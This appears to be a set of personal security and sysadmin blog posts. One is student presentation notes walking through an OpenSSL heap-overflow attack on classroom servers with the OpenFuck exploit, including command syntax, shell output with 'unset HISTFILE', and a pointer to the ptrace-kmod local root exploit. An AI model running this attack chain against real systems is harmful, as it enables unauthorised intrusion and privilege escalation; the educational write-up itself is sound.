Tools
- Tool to allow the use of a browser in solving cryptograms.
- word-game programmers mailing list tools page
- One Across Search Engine
Cryptograms:
Tools
Cryptograms:
This sort of thing is needed. "To name something is to know it" is a bit old-hat, but has some truth to it. We do it for malicious code (though agreement has yet to be reached in some cases), biological viruses, and war. Why not directed virtual attacks?
Compulsive.org has a pointer to CDC's blog.
For anyone not knowing who the Cult of the Dead Cow is, they are the hacker group that brought the world Back Orifice, Camera/Shy, and Peekabooty.
The blog even has a RSS feed for those of us with aggregators.
Jim O'Halloran's Weblog: SquidGaurd and Dan's Guardian - Web Filtering Software is a post on Jim O'Halloran's blog about a couple filtering programs for the Squid web cache.
I wish him luck if he's going to do this sort of thing. Both are a slippery slope into constantly reconfiguring the filters to keep up with the new porn sites added every day.
I've tried keyword filters but that gets out of hand very quickly. Above a certain number of lines (256-character limit), the cache noticably slows.
We then tried various filtering plug-ins, like Squidguard, but they too slowed service once a certain number of sites were entered.
About the only way we were able to get above 5000 sites was to reconfigure Squid to use a private DNS server (only for the cache, but not on the cache) and set up a poison DNS zone for each porn site domain. We were up to well over 21,000 porn sites before we quit adding them (it was turning into a full time job).
The programs DO work, just not well under heavy loads. And there's always a new porn site that's not on the list. I'll post a howto here in the next few days for anyone that actually cares to read it.
Legislating the use of content filtering, while meaning well, is only going to expose various institutions to litigation. Anyone capable of using Google's extra features can get around filters very easily. Some soccer mom is going to sue a city library because her kid saw someone else's kid viewing porn in the back row of workstations at the library. I wish legislators would realize that a public library is an adult building, similar to a church or courthouse. In those areas, children are supposed to be supervised. A public library is no different.
For anyone attempting to use my e-mail file server: it's broken. The latest upgrade broke the local input (due to a major change in how the mail server does things). I think it's time to jump to Postfix.
I'll let you know how things go.
I've switched to the 3-column format. I had to add tables (for now) as the CSS layout was not setting the right-hand margin correctly when I changed font sizes. The text in the middle column was disappearing under the right-hand column.
Anyways.... Please let me know if there's any further display problems (it looks fine in Galeon, for me).
Please bear with me, I retyped this on the fly from memory (the original hardcopy is about 35 miles away) and Google.
Please consider this presentation notes rather than a paper and that this is my first time doing this sort of thing.
I chose the following for my end-of-semester presentation:
Vulnerabilities:
Exploits:
My project started as an experiment with openssl-uzi, which was discussed in class a few weeks ago. It was only available (at the time) on NetSys.com. (ftp://ftp.netsys.com/len/openssl-uzi.tar.gz)
Uzi is not a stack overflow. It's a heap overflow. Stack overflows involve fixed length buffers. Heap overflows involve overflowing dynamically allowcated regions of memory (allocated by a specific application or kernal mod). (See the bottom of this page for the location of a tutorial.)
I downloaded the tool at home and played with it. It comes with a vulnerability scanner which I used here in class. The scanner reported that classroom IP's 172.28.238.250 and 251 are vulnerable.
To determine what versions of which software were being run on the boxes, I used wget with the -S switch (which includes the server header in the return data).
Example:
[root@localhost openssl-uzi]# wget -S 172.28.238.250
--19:12:31-- http://172.28.238.260/
=> 'index.html.5'
Connecting to 172.28.238.250:80...connected.
HTTP request sent, awaiting response...
1 HTTP/1.1 200 OK
2 Date: Mon, 14 Apr 2003 22:58:23 GMT
3 Server: Apache/1.3.19 (Unix) (Red-Hat/Linux) mod_ssl/2.8.1 OpenSSL/0.9.6 DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01
.
.
.
A slew of good info. Try it yourself.
In doing research for the buffer overflow and the exploit, I discovered an even better (easier) exploit called OpenFuck. Better in that the programmer has figured out the required offsets for you. See the source code for the listing (quite a few more included in OpenFuck than in Uzi). Rob even found OpenFuck V2.
OpenFuck is available at: http://packetstorm.linuxsecurity.com/0303-exploits/OpenFuck.c
According to the source code (most of the way down, look for the banner), OpenFuck is based on openssl-uzi's openssl-too-open exploit code.
OpenFuck was really nice. If you read the source code (or running it with no options), you get a list of Linux Distributions and their associated buffer offsets. Note: not restricted to Linux, FreeBSD is also listed.
So, for 172.28.238.250, the indicated offset is 0x5f. The syntax for the command is:
./openfuck 0x5f 172.28.238.250
Example output from the above command:
[root@localhost x]# ./openfuck 0x5f 172.28.238.250
**********************************************************************
* OpenFuck v 2.5.0.2 ripped from openssl-too-open *
**********************************************************************
* If U know more offset please contact us *
* *
**********************************************************************
* offset by SPABAM added LSD shellcode *
* #highsecure *
* TNX special 2 #uname and #hackarena #SilverLords #isotk #BloodBR *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
**********************************************************************
Establishing SSL connection
cipher: 0x4078ba2c ciphers: 0x81f4568
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.04$
bash-2.04$ unset HISTFILE; uname -a; id; echo SPABAM R0X; pwd; w;
Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
SPABAM R0X
/
7:18pm up 4 min, 0 users, load average: 0.00, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.04$
bash-2.04$
(Side note: this may not work if the version of OpenSSL that you're using is older than the version you're trying to attack. A good point to research? We had problems running the exploit from various machines in the open lab.)
Note: Using this a lot against the same box tends to cause a DoS as the binary locks up and refuses to answer connection attempts.
Because 172.28.238.250 chroots its Apache binary as the user apache, we get a shell account as that user.
Once, you're in, check who you are via "whoami". Most often, this will report "apache" or "nobody", depending on the configuration of the Apache server.
To get root, we'll need to employ a local exploit. It took a bit of searching around, but for this system, I found ptrace-kmod.c, which exploits a race condition in this version of the kernel. The source code for this portion of the kernel (kmod.c) is written so that it creates threads in an insecure manner. The exploit causes ptrace to fail while tracking cloned processes which allows the exploit to take control over the provileged modprobe binary. Supposedly it works against all unpatched 2.2.x and 2.4.x kernels.
When the binary fails, shellcode is inserted, and a shell is opened. Viola! You don't get a shell prompt, but it still works. (Show "whoami" and "ls").
Source at: http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c
Fixes:
Precautions:
A good explanation of the OpenSSL heap vulnerability (with colored pictures) is available at: http://project.honeynet.org/scans/scan25/sol/NCSU/exploit-diagram.htm
The heap overflow tutorial available at: http://community.corest.com/~juliano/heap/heaptut.txt
In an article entitled " Intruder Alerts: Detection or Protection", a "panel of analysts" said that "Intrusion detection systems are dead". Can this be the same panel of experts that said Linux/Windows/Disco balls/roller skating is dead?
I think the quote from Vic Wheatman of the Gartner Group gives a good hint: "People bought it, installed it and turned it down when they had too many alerts."
What can you get from reading between the lines? People bought what they'd thought was a black box cure-all, plugged it in, turned it on and refused to face the fact that IDS requires reconfiguring every time your network config changes.
Intrusion detection systems have their place and funtion in any network. You just have to remember that they have their own shortcomings (and configure around those):
IDS are intended to be part of Defense in depth. Hackneyed as that buzz-phrase has become, there's still truth in it. Use multiple layers of protections (filtering routers, firewalls, DMZ's, etc.). Use differing operating systems and vendors in multiple layers (only the more talented hackers will be able to get through multiple layers)(and the majority of your problems are the script kiddies after low-hanging fruit).
In addition to all that, remember: "It's not if but when."
Oh! And there's still a market for disco balls (Ask Saddam. It's said that his love nest was straight out of the 70's.) and roller skates (visit Europe or the People Republic of California!).
Supposedly you can tail your logs at the bottom of a terminal.
The new layout is based on some CSS resources that Simon Willison had pointed to.
Craig from Compulsive.org basically nailed this on (the question about your Vice Mayor didn't really count).
Historically, security managers have always had problems with those people who feel that rank gives them the privelege to be the exception to the rule. These exceptions should not exist. The "priveleged life" is a self-made/self-perpetuating fantasy (actually it's a petty display of power, as in "I'm senior enough that the rules don't apply to me"), and the source of +50% of a security managers problems (insider abuse).
If an organization is set up correctly, the security manager answers only to the #1 person (the person whose signature is at the bottom of the policy statements) in the organization. Once you start allowing exceptions to any policy, it corrupts the overall impression of that policy, and often leads to large scale contempt of that policy.
Mr. Ibarra stated that City Hall was a public building. That's incorrect. City Hall is the building where elected officials and public employees work and expect a secure environment to perform that work in. It may be a common belief that a building is public property but that does not give anyone the automatic "right" of access. The same rules that apply to the person pushing the mop (who actually needs more access to do their job) should apply to the person weilding the pen or gavel (who usually needs access to only 2-4 rooms in the building).
Cringely's article (at least this one) is entertaining (if you can consider massive waste a form of entertainment). I've seen similar things and can attest that you can make a marginal living collecting/buying, repairing and reselling those throwaway technologies. (You've seen the used bicycle repair shop downtown right?) Google should consider allowing volunteer techs from a local charity to cart them out and Frankenstein them. Heck, it'd probably make a decent tax write-off.
Nowadays, my wife looks at me cross-eyed when I object to her suggestion of getting rid of her old computer when we upgrade. During my teenage years, we kept out POS cars running by scavenging off of same model junkers in the local junk yard. I just know that computer will make a good mail/file server.
Another fun part of their site is the daily trivia page.
I've got about three years worth of news articles (mostly text) in MySQL tables which I've formatted into a single table (mostly HTML) and have inserted into the submissions queue in PHP-Nuke. I still have the original tables if it helps.
I've found html2ps but appears to be overkill. Anyone know of something better?
The short version is that the former Vice Mayor of Tuscon was stopped from entering the city building (twice, same day, different doors) because of his lack of ID. The guards were just doing their job: "no ID, no entrance". Councilman Ibarra was then critical of them while talking to the local newspaper.
If the Mayor of Tuscon has a head on his shoulders, he'll take the Honorable Mr. Ibarra to task (privately this time) for his actions and publicly commend the City Clerk (in charge), the four security officers and the city maintenance worker.
Pop Quiz:
Answers tomorrow!
Not that I like a lot of the articles out of ZDNetAU (I don't), but this one discusses a subject that admin and security mailing lists have touched on a lot recently. The short version is that the article is a brief explanation of honeypots and botnets.
Thanks to LinuxSecurity.com for pointing it out.
No in-depth explanations or theory, but a good starting point if you're just beginning admin or security.
File this one under "How to Profit from a Declining Economy". Seems that Microsoft has discovered a way to profit from the downsizing or divesting of other companies. InfoWorld has an article here. Wanna bet this also applies to the purchase programs where employees are allowed to buy the systems the company has decided to replace? How long before the BSA starts visiting your local yard sale to see if anyone selling their old systems in the driveway?
Read your licensing agreements people!!
Thanks to SecuriTeam for pointing it out.
I disagree with Mr. Flintz's position that it would be near impossible to check all of its customers' web sites. They can either: 1) use a tripwire like program to alert for changes, 2) read their server log files, 3) Parse existing websites for relationship trees (more than one tree means a hidden site!), or 4) make usage logs available to each customer and prompt them to monitor their own traffic.
On the plus side: included in the tar ball is a scanner to determine if (a|your) web server is vulnerable. You should, at least, compile that one and test your servers.
Initial impressions:
Note: Since I wrote this last weekend, I've found a derivative of OpenSSL-Uzi called OpenFuck and a second version of it. Each are based on Uzi's code but include the offsets for a lot more distributions (and not only Linux!)
Anyone have anything to add?
A decent read.
Well, they've done it. A marketing type has said, "We do view Google more and more as a competitor. We believe that we can provide consumers with a better product and a better user experience."
Note: The rest of this piece is speculative conjecture.
Given that:
At the risk of driving my coworkers into seizures by my restating this, MS Office is a very nice product. Ignoring the security problems, there is very little to compare with it. But remember, they were in at the start of that race. Everything else since then (including networking) has failed supplant competitors.
Since Microsoft's marketing practices, of late, appears to view everything as an "income stream" (including Joe Sixpack users)(Can you say "license subscriptions"?), stand by for a LOT of hype following the release of, at best, a fair product.
To compete with Google and it's half-doze or so cousins, MS is going to have to come up with a better product (without infringing on Google's code). About the only way I think they can improve on Google is to use all of those idle processing cycles on the user's desktop. All it would take would be a slight modification of the EULA and MS would have the "right" to use them. That or some really nasty marketing/legal/political actions.
I wonder what they're up to. And how much of a security nightmare it's going to be.
I think I'll try installing it on the SRX-77 again since it now supports ACPI (needed for the wireless).
In Evil I, we witness blog comment spam from a marketing company in Malaysia. (That one was easy as the CMS software logged the offending IP's and it's not like we read each others blogs now is it?).
In this sequel, we witness this. Seems that some spammers are no longer content with forging headers and hijacking mail servers, some are now rerouting traffic across the Internet to disguise themselves. Think of it as something like turning on the tube to watch Fox News and getting Faux News.
Comment page hijacking. Seems that if you leave "Allow HTML" turned on, comment authors can add which will drag the browsing user to the new URL.
Source: MT User Forums.
Blackbox eZine has an article about shell coding for buffer overflow exploits.
Doing the math, the estamated "loss" was a cool 1/4 mil., generated by 13 cable connections. That comes to approximately $20K per household. Given the maximum speed of an uncapped modem, I doubt the local cable company let things go so long that each generated an upstream bill for the cable company amounting to $20K.
Somehow I think the cable company futzed the numbers so that they were high enough to get the FBI involved (you've got to convince the judge). Wanna bet the majority of the Toledo 13 are teenagers? Is this a case of the "victim" wasting the FBI's time and resources?
Would someone who agrees with the cable company's loss please explain it to me? (But keep in mind that I have a ready rant about bandwidth not being a conservable resource.) Yes, I can see the cable companies side of the argument. I just can't figure out the numbers or why the FBI got involved. This probably should have been just an issue for local law enforcement.
There's got to be more to the story.